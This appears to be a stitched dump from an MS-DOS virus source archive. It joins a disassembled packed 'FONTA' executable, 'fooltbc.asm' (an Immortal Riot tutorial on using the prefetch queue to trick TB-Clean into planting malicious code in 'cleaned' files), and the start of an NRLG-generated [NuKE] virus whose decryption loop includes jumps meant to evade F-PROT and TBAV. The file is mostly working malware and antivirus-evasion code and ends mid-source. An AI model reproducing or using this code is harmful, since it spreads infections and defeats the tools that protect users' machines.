;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ FONTA ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 19-Jan-92 ÛÛ
;ÛÛ Code type: special ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_28e equ 1003h ;*
data_29e equ 1232h ;*
data_30e equ 180Ch ;*
data_33e equ 2005h ;*
data_36e equ 2412h ;*
data_38e equ 3079h ;*
data_47e equ 7830h ;*
data_50e equ 91F0h ;*
data_51e equ 99BDh ;*
data_53e equ 0A901h ;*
data_56e equ 0B3A1h ;*
data_60e equ 0BD01h ;*
data_61e equ 0BF04h ;*
data_70e equ 0F601h ;*
data_71e equ 0F630h ;*
data_72e equ 0F712h ;*
;-------------------------------------------------------------- seg_a ----
seg_a segment byte public
assume cs:seg_a , ds:seg_a
mov ax,3463h
mov dx,75Ch
cmp ax,sp
jae loc_2 ; Jump if above or =
mov ax,sp
sub ax,344h
and ax,0FFF0h
mov di,ax
mov cx,0A2h
mov si,17Ch
cld ; Clear direction
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov bx,ax
mov cl,4
shr bx,cl ; Shift w/zeros fill
mov cx,ds
add bx,cx
push bx
xor bx,bx ; Zero register
push bx
retf ; Return far
db 0Dh, 01h, 41h
db 'nother Fine aHa/nBa Elite/WareZZ'
db 'ZZZZZZZZZZZZZZZZNot enough memor'
db 'y$'
loc_2:
mov ax,900h
mov dx,15Fh
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; DOS program terminate
nop
std ; Set direction flag
mov di,ax
dec di
dec di
mov si,offset data_22
add si,dx
mov cx,dx
shr cx,1 ; Shift w/zeros fill
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
cld ; Clear direction
xchg si,di
inc si
inc si
mov di,100h
lodsw ; String [si] to ax
xchg ax,bp
mov dx,10h
jmp short loc_12
db 90h
loc_3:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_14
loc_4:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_15
loc_5:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_16
loc_6:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_20
loc_7:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_21
loc_8:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_22
loc_9:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_23
loc_10:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jc loc_13 ; Jump if carry Set
loc_11:
movsb ; Mov [si] to es:[di]
loc_12:
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_10 ; Jump if zero
jnc loc_11 ; Jump if carry=0
loc_13:
xor cx,cx ; Zero register
xor bx,bx ; Zero register
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_3 ; Jump if zero
loc_14:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_4 ; Jump if zero
loc_15:
rcl bx,1 ; Rotate thru carry
test bx,bx
jz loc_18 ; Jump if zero
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_5 ; Jump if zero
loc_16:
rcl bx,1 ; Rotate thru carry
cmp bl,6
jb loc_18 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_17 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_17:
rcl bx,1 ; Rotate thru carry
loc_18:
mov cl,byte ptr cs:[11Ch][bx]
cmp cl,0Ah
je loc_26 ; Jump if equal
loc_19:
xor bx,bx ; Zero register
cmp cx,2
je loc_25 ; Jump if equal
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_6 ; Jump if zero
loc_20:
jc loc_25 ; Jump if carry Set
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_7 ; Jump if zero
loc_21:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_8 ; Jump if zero
loc_22:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_9 ; Jump if zero
loc_23:
rcl bx,1 ; Rotate thru carry
cmp bl,2
jae loc_27 ; Jump if above or =
loc_24:
mov bh,byte ptr cs:[12Ch][bx]
loc_25:
lodsb ; String [si] to al
mov bl,al
push si
mov si,di
sub si,bx
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop si
jmp short loc_12
loc_26:
lodsb ; String [si] to al
add cl,al
adc ch,0
cmp al,0FFh
jne loc_19 ; Jump if not equal
jmp short loc_31
loc_27:
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_28 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_28:
rcl bx,1 ; Rotate thru carry
cmp bl,8
jb loc_24 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_29 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_29:
rcl bx,1 ; Rotate thru carry
cmp bl,17h
jb loc_24 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_30 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_30:
rcl bx,1 ; Rotate thru carry
and bx,0DFh
xchg bl,bh
jmp short loc_25
loc_31:
xor ax,ax ; Zero register
push es
mov bx,100h
push bx
mov bx,ax
mov cx,ax
mov dx,ax
mov bp,ax
mov si,ax
mov di,ax
retf ; Return far
db 03h, 00h, 02h, 0Ah, 04h, 05h
db 00h, 00h, 00h, 00h, 00h, 00h
db 06h, 07h, 08h, 09h, 01h, 02h
db 00h, 00h, 03h, 04h, 05h, 06h
db 00h
db 7 dup (0)
db 07h, 08h, 09h, 0Ah, 0Bh, 0Ch
db 0Dh, 90h,0A0h, 00h,0EBh, 33h
db 90h, 0Dh, 20h, 01h, 0Dh, 0Ah
db 20h, 41h, 6Eh, 6Fh, 00h, 00h
db 'ther fine aHa/nB'
db 0C0h
db 9, 'a WAREZ'
db 01h, 00h, 1Ah, 03h, 00h, 40h
db 02h, 01h, 01h, 04h, 7Ah, 10h
db 00h, 01h,0B8h, 00h, 05h,0CDh
db 10h,0B4h, 0Fh, 01h, 80h, 04h
db 0BFh, 2Ch, 01h, 8Ah, 25h, 3Ah
db 0C4h, 74h, 06h, 8Ah,0C4h, 32h
db 0E4h, 02h
db 45h
loc_33:
;* pop cs ; Dangerous 8088 only
db 0Fh
mov bp,163h
mov di,data_29e
cmp ax,1B9h
or ah,[bp+di]
xor dx,dx ; Zero register
xor bl,bl ; Zero register
mov ax,1110h
adc al,0C3h
nop
sbb ax,50h
pop es
add [bp-7Fh],di
movsw ; Mov [si] to es:[di]
add word ptr ds:data_51e[bx+di],284Eh
add al,7Eh ; '~'
adc [si-2],bh
db 0FEh,0D6h, 03h,0B8h,0A9h,0BAh
db 0C6h,0FEh, 7Ch, 21h, 6Ch,0EEh
db 0Fh,0C2h, 8Dh, 01h, 7Ch, 38h
db 10h, 10h, 10h, 38h, 7Ch, 3Eh
db 0ABh, 01h, 0Eh, 10h, 0Dh,0D4h
db 9Fh, 24h, 6Ch, 07h, 1Fh,0FEh
db 0A4h, 43h,0FEh, 10h, 01h, 18h
db 3Ch, 9Ch, 26h, 01h, 18h, 0Bh
db 0FFh, 01h,0E7h, 65h, 3Bh,0C3h
db 01h,0E7h, 0Ah,0FFh,0D5h, 7Dh
db 1Fh, 66h, 01h, 21h,0AAh,0BBh
db 1Fh, 99h, 01h, 21h, 80h, 74h
db 12h, 1Eh
db 0Eh, 1Eh, 36h, 78h,0CCh, 01h
db 78h, 9Eh,0B8h
db 42h, 2Dh, 7Eh
db 18h, 18h, 91h, 70h
loc_36:
push dx
push ds
sbb bl,ds:data_30e
js loc_36 ; Jump if sign=1
jo loc_41 ; Jump if overflow=1
push ax
adc byte ptr ds:[236h],bh
db 36h, 76h,0F6h, 66h, 4Eh, 12h
db 37h, 0Ch, 7Dh,0DBh, 7Eh, 33h
db 3Ch, 7Eh, 37h, 00h,0DBh, 30h
db 00h, 80h,0E0h,0F0h,0FCh,0FEh
db 0FCh,0F0h,0E0h
db 37h
data_22 db 80h
db 80h, 10h, 02h, 0Eh, 3Eh, 7Eh
db 0FEh, 7Eh, 3Eh, 0Eh, 02h, 77h
db 0D6h,0ADh, 5Ch, 61h,0EBh,0CCh
db 0B2h, 66h, 01h, 08h, 93h, 24h
db 10h, 7Fh,0DBh, 01h, 7Bh, 1Bh
db 2Fh, 00h, 01h, 30h,0C6h,0C6h
db 60h, 7Ch,0F6h
loc_40:
xchg ax,sp
xchg bl,dh
jl $+0Eh ; Jump if <
or [si+0],bh
push si
loc_41:
sbb word ptr [bp+233h],0FA50h
;* jg loc_46 ;*Jump if >
db 7Fh, 4Fh
jle $+5 ; Jump if < or =
db 60h,0C0h,0FFh, 09h, 0Dh, 70h
db 01h, 0Ch, 0Eh,0FFh, 1Ah, 40h
db 0Eh, 0Ch, 01h,0A3h, 30h, 70h
db 0FEh, 70h, 30h, 83h,0D2h, 02h
db 0B4h,0C0h, 01h,0FEh, 41h,0C3h
db 01h, 0Fh, 24h, 66h,0FFh, 66h
db 24h, 02h, 90h
db 42h
db 2Fh, 83h, 00h, 8Bh, 0Eh, 1Ah
db 0FAh, 7Ch, 38h, 01h,0B1h, 04h
db 01h, 40h,0D5h, 9Dh, 7Ch, 7Dh
db 2Dh, 75h, 90h, 36h, 01h, 14h
db 02h
db 20h, 65h, 7Bh, 6Ch
db 01h,0FEh, 03h, 6Ch, 0Bh,0EAh
db 0B0h,0F2h
loc_46:
db 0C0h, 78h, 3Ch, 06h,0EEh, 05h
db 38h,0C2h, 00h, 62h, 66h, 0Ch
db 18h, 30h, 66h,0C6h, 81h, 80h
db 0Dh, 38h, 6Ch, 38h, 30h, 76h
db 7Eh,0B0h, 76h,0B3h
db 0F4h,0CCh, 01h, 18h, 03h, 70h
db 0DCh,0EEh, 2Bh, 01h, 18h,0E2h
db 0DCh, 7Ah, 09h, 01h, 18h
db 00h,0E2h,0A1h, 0Fh, 42h,0FEh
db 38h, 6Ch, 02h,0A3h
db 0F4h,0AEh,0EFh, 05h,0B7h, 04h
db 58h,0FEh,0BFh, 48h, 09h,0D8h
db 1Fh, 01h, 03h, 06h
db 5Dh, 2Eh
db 08h, 60h,0C0h,0F0h, 7Eh, 92h
db 0Fh, 7Dh,0DBh,0DBh, 05h, 3Ch
db 0F8h, 90h, 78h, 82h,0B0h,0DDh
db 0D0h, 30h,0C6h, 45h,0D5h, 54h
db 10h, 06h, 06h
db 0EEh, 01h, 03h, 28h,0DEh, 0Ch
db 1Ch, 3Ch, 6Ch,0DDh,0E5h, 86h
db 0FEh, 7Fh, 1Eh, 7Bh,0C2h,0C0h
db 0C0h,0FCh, 1Eh,0A8h, 01h, 20h
db 1Eh, 10h,0FAh, 68h, 44h, 0Eh
db 0FEh,0CFh, 9Fh, 4Fh, 01h, 60h
db 0C6h, 7Ch,0BEh,0F5h, 01h, 20h
db 0Ch, 7Eh, 00h
db 40h, 7Dh
db 0F6h,0DCh, 04h, 04h, 10h, 77h
db 0FBh,0F0h,0CDh, 60h, 70h, 36h
db 40h,0FFh, 01h,0CCh,0FDh, 01h
db 1Bh,0C2h,0D3h,0B0h, 60h, 0Ch
db 18h, 00h,0E0h, 15h
data_23 dw 705Eh ; Data table (indexed access)
db 0DEh, 01h,0DCh,0C0h, 7Eh, 31h
db 08h, 22h, 38h, 38h, 6Ch,0FFh
db 0E2h, 67h, 66h,0C0h, 01h, 8Ah
db 0Dh, 20h,0FCh,0B2h, 33h, 32h
db 3Ch, 32h, 33h, 05h,0FCh,0B0h
db 43h, 08h, 60h, 33h, 61h,0F2h
db 08h, 6Fh,0C4h, 6Ch,0DFh,0F8h
db 6Ch, 98h, 3Ch, 36h, 33h, 01h
db 0F3h, 76h, 3Ch, 20h, 29h, 9Dh
db 7Ch,0DAh, 7Eh, 04h, 33h, 40h
db 07h, 83h, 21h,0FFh,0B0h, 32h
db 7Eh, 70h, 00h,0EFh, 00h, 1Ch
db 36h, 63h, 70h, 09h,0C1h,0C0h
db 0CCh,0CCh,0DCh,0BFh, 00h, 50h
db 98h, 0Eh,0E6h, 66h, 6Fh,0FEh
db 04h, 66h, 6Eh,0E0h, 70h, 60h
db 0Eh, 1Bh, 1Fh,0FCh,0D8h, 7Fh
db 4Eh,0C1h, 0Ah,0BEh,0FFh, 1Bh
db 20h, 36h, 13h
db 0CCh, 4Ch, 7Ch, 72h, 03h, 00h
db 0CEh,0C3h,0C3h,0C6h,0CCh,0D8h
db 0F0h,0F8h,0CCh,0C6h,0C0h, 80h
db 83h,0C5h, 3Eh, 6Fh, 37h,0FCh
db 09h,0E0h, 62h,0C0h,0E3h, 63h
db 73h, 7Fh, 5Bh, 43h, 43h,0C3h
db 80h, 92h,0E0h, 07h, 30h, 63h
db 0B0h, 15h, 11h, 67h, 63h, 61h
db 0E0h, 31h, 1Eh, 0Ah,0E3h,0F3h
db 80h,0C3h, 44h, 5Fh, 20h, 02h
db 0C9h,0ACh,0F3h,0B3h, 33h, 3Bh
db 36h, 42h, 3Ch,0F0h, 0Dh,0C0h
db 21h,0E3h,0C1h,0C1h,0D1h,0DBh
db 0DFh,0CEh, 7Eh, 07h, 03h, 80h
db 02h, 1Fh,0E6h
db 'Pf|xnwIg@'
db 11h,0EEh, 3Eh
db 0B0h, 95h, 70h, 1Ch, 06h, 66h
db 3Eh, 6Eh,0FFh, 99h, 0Ch, 7Fh
db 51h, 01h, 5Eh, 03h, 25h, 17h
db 7Bh, 01h,0C7h,0EEh, 58h,0F0h
db 0C0h, 01h, 13h, 1Eh
db 36h, 08h
db 1Bh,0D0h
db 18h, 99h, 01h,0BDh,0E7h,0B3h
db 54h, 42h, 0Eh, 29h, 42h,0FBh
db 50h,0A9h,0CEh, 7Eh, 06h
db 42h, 0Ch, 29h
db 0F9h, 10h, 81h
dw 2412h ; Data table (indexed access)
db 3Ch, 14h, 02h
db 11h, 03h, 0Fh, 3Bh,0E3h,0CAh
db 0C9h,0BEh, 33h, 25h,0F8h,0D1h
db 7Ch, 60h,0FDh,0D0h, 01h, 20h
db 80h, 02h, 2Eh,0FDh, 06h, 03h
db 01h,0BCh, 27h,0D0h, 8Dh, 20h
db 10h,0E8h, 61h, 38h, 6Ch,0C6h
db 00h, 0Eh, 01h,0A9h,0C3h, 50h
db 67h, 0Ch, 08h, 19h, 78h,0D8h
db 0D8h,0DCh, 21h, 0Ch,0B0h, 00h
db 0E0h,0C0h,0C7h, 5Eh, 7Eh,0F3h
db 33h, 33h, 53h,0C1h, 8Fh, 02h
db 4Ch,0F0h, 00h, 00h, 07h, 6Ch
db 7Eh,0CFh,0CCh,0CCh, 7Fh, 03h
db 4Ch, 3Eh, 3Ch, 67h,0C3h,0F3h
db 0DEh,0C0h, 6Eh, 3Ch, 0Ch, 06h
db 0A0h, 08h, 1Ch, 5Ch, 30h, 34h
db 0FCh,0B0h, 09h, 78h, 00h,0D0h
db 7Bh,0CEh,0C6h,0CEh, 76h,0B8h
db 0B8h,0E2h, 1Ch, 3Dh, 72h, 61h
db 03h,0A8h,0F0h, 0Eh, 01h, 61h
db 36h, 82h, 39h, 04h, 02h, 00h
db 03h, 03h,0C6h,0CCh, 8Fh, 8Fh
db 00h, 69h, 0Ah, 30h, 18h, 01h
db 12h, 66h,0FFh,0EBh,0E9h, 84h
db 63h, 01h, 40h, 0Eh, 40h, 60h
db 7Ch,0E6h, 65h, 5Eh,0B3h, 60h
db 0C0h, 83h, 1Eh, 67h, 01h,0CEh
db 2Ch, 5Ah, 40h, 03h,0B3h, 5Ch
db 54h, 03h,0A5h, 04h,0E0h,0C1h
db 0CEh,0CDh,0CCh,0CDh,0CEh, 7Ch
db 0D2h, 86h, 9Fh, 41h, 62h, 60h
db 60h,0F8h,0DFh, 76h, 63h, 00h
db 2Fh, 71h, 6Ch, 3Ch, 3Fh, 3Eh
db 9Ah, 0Ch,0F0h,0B0h, 01h,0D0h
loc_63:
db 6Ah,0BCh, 03h, 43h, 01h, 00h
db 0A8h, 99h, 02h, 36h, 01h,0D0h
db 18h
loc_64:
db 0C6h, 2Dh, 00h, 00h, 01h,0C3h
db 1Ch, 3Fh,0C1h, 3Ch, 66h,0C3h
db 10h, 80h, 08h,0B9h,0C1h, 63h
db 36h, 1Ch,0B1h
loc_65:
add word ptr ds:[0C1h],bp
or [bx+si-28h],bh
xor [si],ah
jl loc_64 ; Jump if <
dec cx
push bx
xor dl,ch
jo loc_65 ; Jump if overflow=1
push cs
add word ptr [bp+0],0
nop ;*ASM fixup - displacement
nop ;*ASM fixup - sign extn byte
add [bx+si],ax
cmp [di+1Ch],bx
and al,18h
add word ptr [bp+7600h],7DCh
esc 6,al ; coprocessor escape
mov al,12h
retn 8857h
into ; Int 4 on overflow
db 66h,0CFh,0C6h, 64h, 81h, 82h
db 0Ch,0CCh, 5Fh,0C6h,0C6h, 4Ch
db 1Eh, 03h, 01h,0CEh, 76h, 1Dh
db 0CAh
db 5Eh, 23h
db 0FEh,0C0h,0A5h, 80h, 90h, 30h
db 78h,0CCh, 00h, 78h, 0Ch, 7Ch
db 90h, 8Bh,0C1h, 7Ah,0B0h, 20h
db 0CCh, 04h, 10h, 8Ch, 87h,0F5h
db 03h, 10h
db 0FFh, 04h, 30h,0C3h,0C2h, 12h
db 2Dh,0CEh, 2Eh, 0Ch, 43h, 50h
db 3Eh, 7Bh, 02h, 60h, 50h, 03h
db 70h,0B0h, 47h, 9Fh, 03h, 20h
db 0B0h, 5Dh, 78h, 38h,0EFh, 3Ch
db 0DEh, 67h,0AFh, 04h, 10h, 80h
db 0CFh, 90h, 02h, 10h,0CFh, 02h
db 0CAh,0B7h, 40h,0D2h, 8Fh, 4Fh
db 21h, 02h, 10h,0DFh,0FEh, 21h
db 1Fh, 4Ch, 50h, 01h,0B7h,0E0h
db 66h,0DBh, 1Bh, 7Fh,0D8h,0D8h
db 0DFh,0B0h, 7Eh, 2Ah,0E9h, 0Bh
db 01h,0FEh, 04h,0DEh,0C3h,0B2h
db 00h,0A3h, 37h,0FBh, 90h, 48h
db 02h, 10h,0DDh,0B3h,0B0h, 00h
db 10h, 30h, 61h,0F6h, 02h, 50h
db 0A0h, 02h, 10h, 0Bh, 9Fh, 6Fh
db 0FCh,0F7h, 10h, 4Fh, 40h, 83h
db 7Fh, 8Fh, 70h, 05h, 5Fh, 70h
db 0C0h,0A8h, 92h, 6Eh,0CDh,0BAh
db 0F0h,0F8h,0E2h,0BEh, 66h,0F6h
db 6Ch, 9Fh, 48h,0EEh, 0Fh, 3Ch
db 20h, 70h, 88h, 7Bh,0FCh,0C0h
db 0CCh,0DEh, 70h, 28h, 80h, 07h
db 0Eh, 56h, 48h, 1Bh, 18h, 3Fh
db 01h, 2Eh, 34h,0D8h, 70h, 01h
db 02h
db 0CCh, 86h,0A0h, 10h, 02h, 40h
db 8Bh,0FFh, 00h, 80h,0F0h, 91h
db 48h, 3Eh, 04h, 7Eh,0D0h, 2Dh
db 0F1h, 60h,0BCh, 5Fh,0E6h, 16h
db 1Ch, 0Fh, 2Bh,0E6h,0F6h,0DEh
db 0CEh, 00h, 34h, 60h, 00h, 3Ch
db 6Ch, 6Ch, 3Eh, 00h, 7Eh, 00h
db 06h,0D1h, 7Ch, 7Ah, 38h, 00h
db 7Ch,0E2h, 90h, 02h,0CDh,0E0h
db 08h, 2Dh, 5Fh, 02h, 55h,0B6h
db 2Eh, 31h,0D2h, 03h, 1Ch,0E1h
db 95h, 51h, 72h, 48h,0CEh, 60h
db 62h, 66h, 6Ch, 85h,0CAh, 0Fh
db 0DCh, 36h, 9Ah, 3Eh, 10h, 36h
db 6Eh,0DEh,0CEh, 25h, 36h, 7Eh
db 23h, 5Ah, 1Eh, 0Eh, 3Ch, 00h
db 62h, 11h, 7Ah,0C4h, 6Ch,0D8h
db 6Ch, 36h, 01h, 4Eh, 72h,0D2h
db 0Eh, 6Ch,0D8h, 0Bh, 11h, 44h
db 0E9h, 74h, 04h, 02h,0AAh, 55h
db 04h, 02h,0DDh, 77h, 04h, 02h
db 5Dh, 7Fh, 18h
db 0Dh, 01h,0F8h, 05h, 0Eh,0DDh
db 0EEh, 10h, 36h, 01h,0F6h, 08h
db 2Fh,0F4h,0A2h, 03h, 10h,0CEh
db 0DBh, 06h, 30h,0F6h, 06h, 30h
db 0EFh, 5Eh, 06h, 01h, 3Eh, 05h
db 20h, 0Fh,0DFh
db 30h
db 0BDh, 12h,0F7h, 6Fh, 10h, 90h
db 05h,0AAh,0EBh, 03h,0F8h, 05h
db 0C0h
db 1Fh, 03h,0A5h, 79h, 30h, 01h
db 0FFh, 06h, 2Ah, 6Fh,0A6h, 06h
db 30h, 05h
db 74h
loc_72:
push word ptr [bx+0Dh]
push es
inc ax
add ax,1F2Eh
add ax,3A3Ah
adc [bx],dh
add ax,ax
aaa ; Ascii adjust
xor [bx],bh
add bp,[bp+3Fh]
popf ; Pop flags
pop si
xor [si],al
and bh,dh
add [si],al
nop
mov dx,0E06h
test word ptr [di],3740h
add sp,[bx+si]
db 0FFh,0FBh,0FFh, 30h, 40h,0BEh
db 0BDh, 30h,0DEh, 04h, 20h,0BAh
db 0DEh, 01h, 06h, 60h,0FFh, 06h
db 0E0h,0A0h,0FBh, 05h, 88h, 3Fh
db 03h,0F0h, 1Fh, 70h, 6Ah, 40h
db 01h, 1Fh, 07h,0D0h, 75h, 20h
db 3Fh, 05h, 40h,0FFh, 04h, 90h
db 0Dh
db 0Dh, 18h, 06h, 60h, 06h,0AFh
db 0DEh,0B0h, 50h,0FFh, 05h, 01h
db 0C2h,0A9h, 00h,0CAh, 01h
loc_75:
lock jmp short loc_75
add ax,0F01h
add ax,601h
cmp ds:data_56e[bx+si],dl
int 10h ; ??INT Non-standard interrupt
jcxz $+2 ; Jump if cx=0
mov al,byte ptr ds:[0CC78h]
esc 0,[bp+si+3615h] ; coprocessor escape
out 0DCh,al ; port 0DCh, DMA-2 clr mask reg
db 0C0h, 70h,0C5h, 62h,0FEh, 66h
db 62h, 71h, 96h,0EDh, 00h, 5Fh
db 6Ch, 01h, 27h, 8Bh,0D0h, 62h
db 80h, 96h, 9Fh, 30h, 62h,0C6h
db 00h, 09h,0E5h, 73h, 7Eh,0D8h
db 20h,0D8h, 70h,0B3h,0E9h, 50h
db 01h, 7Ch, 2Bh,0B3h, 71h, 71h
db 81h, 61h, 01h, 1Ch,0FEh, 38h
db 0EAh,0BDh, 90h, 6Ch, 06h, 40h
db 0ECh, 89h, 9Fh, 33h,0CBh, 61h
db 0Fh, 0Eh, 01h,0EEh,0D5h, 8Ah
db 0D0h, 89h, 3Ch, 66h, 7Ch,0BAh
db 12h, 00h, 19h,0EDh, 70h, 82h
db 53h, 40h, 63h, 02h, 06h, 7Ch
db 0CEh,0DEh,0F6h,0F6h, 3Eh,0D9h
db 70h, 71h, 30h, 32h, 5Ah,0E0h
db 30h, 1Ch, 01h,0D9h,0ADh, 60h
db 01h, 01h, 6Ah,0F5h, 2Dh,0FEh
db 02h, 33h,0AAh,0BEh, 5Fh, 7Eh
db 6Ah, 55h, 90h, 06h, 8Dh,0ADh
db 0ACh, 7Eh, 00h, 6Fh,0F2h,0A3h
db 6Dh, 72h, 0Ch, 1Eh, 1Ah, 29h
db 5Ah, 09h, 12h, 58h, 78h, 30h
db 00h,0A5h,0D5h, 7Ah, 7Eh, 00h
db 03h,0B1h,0B0h, 2Fh, 25h,0D0h
db 5Bh, 97h, 78h,0CCh, 01h,0CAh
db 07h,0FDh, 1Bh,0ADh, 11h, 05h
db 0E1h,0D4h, 0Ah,0D8h,0D8h, 78h
db 38h, 14h,0D8h,0B0h,0A2h, 01h
db 8Ch, 00h,0D8h, 6Ch,0B4h,0A1h
db 04h, 3Fh, 7Eh,0F5h, 36h, 01h
db 00h, 1Ch, 01h,0FCh,0B4h,0A1h
db 00h,0FCh, 00h, 0Dh, 6Dh,0FCh
db 00h,0FCh, 68h, 43h, 00h,0FCh
db 00h, 1Bh,0DAh,0FCh, 00h,0FCh
db 0D0h, 86h, 00h,0FCh, 00h, 36h
db 0B4h,0FCh, 00h,0FCh,0A1h, 0Dh
db 00h,0FCh, 6Dh, 68h, 00h,0FCh
db 00h,0FCh, 43h, 1Bh, 00h,0FCh
db 0DAh,0D0h, 00h,0FCh, 00h, 86h
db 06h, 8Ah, 00h,0FFh, 00h
seg_a ends
end

88
MSDOS/Virus.MSDOS.Unknown.fooltbc.asm Normal file
View File

@ -0,0 +1,88 @@
;
; How to fool TB-Clean using the prefetch queue.
;
; Conzouler / Immortal Riot 1995.
;
; (Ideas from 40Hex magazine issue 7)
;
; Debuggers like TB-Clean reads one instruction a time from
; memory while the processor will read 16 and put them in a
; prefetch queue. Therefore, if you change code that already
; is is in the prefetch the change won't affect the program
; when run normally, but if the program is run with TB-Clean
; it will run the changed code.
; Any branch (jumps, calls, ints and rets) will flush the
; prefetch and 16 bytes will be read from the new position.
; So, you can change the location of a jump to make some
; code run if a debugger is used but another when executed
; normally. Get it?
; The fun part with TB-Clean is that you can use this tech-
; nique to simulate a program restoration but instead you
; put some mean code instead of the original program.
;
; You can also just do an int20 when tbscan is executed and
; make TB-Clean say: "File might not be infected at all or
; is damaged by an overwriting virus". Which is exactly what
; TB-Clean would say if the file wasn't infected in the first
; place.
;
; Try to compile this code and run it, then use TB-Clean on it
; and rerun the "cleaned" file.
;
.model tiny
.code
org 100h
start:
jmp entry
; Carrier file...
carrier db 1+offset nodebug-offset debug dup(90h)
; Your code...
entry:
call delta ; Get delta offset.
delta: pop si ; TbScan will detect this
; but this is about fooling
; TbClean.
mov byte ptr ds:[$+6], 0 ; This changes the jump.
jmp short nodebug ; If this is a near jump
; you'll have to make above
; a word ptr and add 7 instead.
; Here is the code that simulates a restoration.
mov di, 100h ; Offset to entry point.
push di ; Save to perform a ret later
add si, offset debug - offset delta
; Relative offset to routine
; to put at entry point.
mov cx, offset nodebug - offset debug
; Size of routine.
rep movsb ; Move the code.
ret ; Jump to entry point.
debug:
; Here is the routine TBClean will put in the restored program.
mov ah, 9 ; Display string.
mov dx, 100h + offset tbsux - offset debug
int 21h
ret ; Instead of int20
tbsux db 'TB-Clean stinks!!!',7,'$'
nodebug:
; Here is your normal code.
mov ah, 9h ; Display string
add si, offset msg - offset delta
mov dx, si
int 21h
int 20h
msg db 'Hi dudez.. tbclean cannot disinfect diz...$'
end start

490
MSDOS/Virus.MSDOS.Unknown.fornicat.asm Normal file
View File

@ -0,0 +1,490 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿxor word ptr [di],0fbfbh
add byte ptr [di],087h
add word ptr [di],0c574h
add byte ptr [di],0b8h
sub word ptr [di],04d33h
sub byte ptr [di],0b2h
sub word ptr [di],0279h
sub word ptr [di],01bc5h
sub word ptr [di],01a8ah
add word ptr [di],0d649h
add byte ptr [di],0b4h
xor byte ptr [di],0cch
sub byte ptr [di],089h
inc word ptr [di]
xor byte ptr [di],098h
not word ptr [di]
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
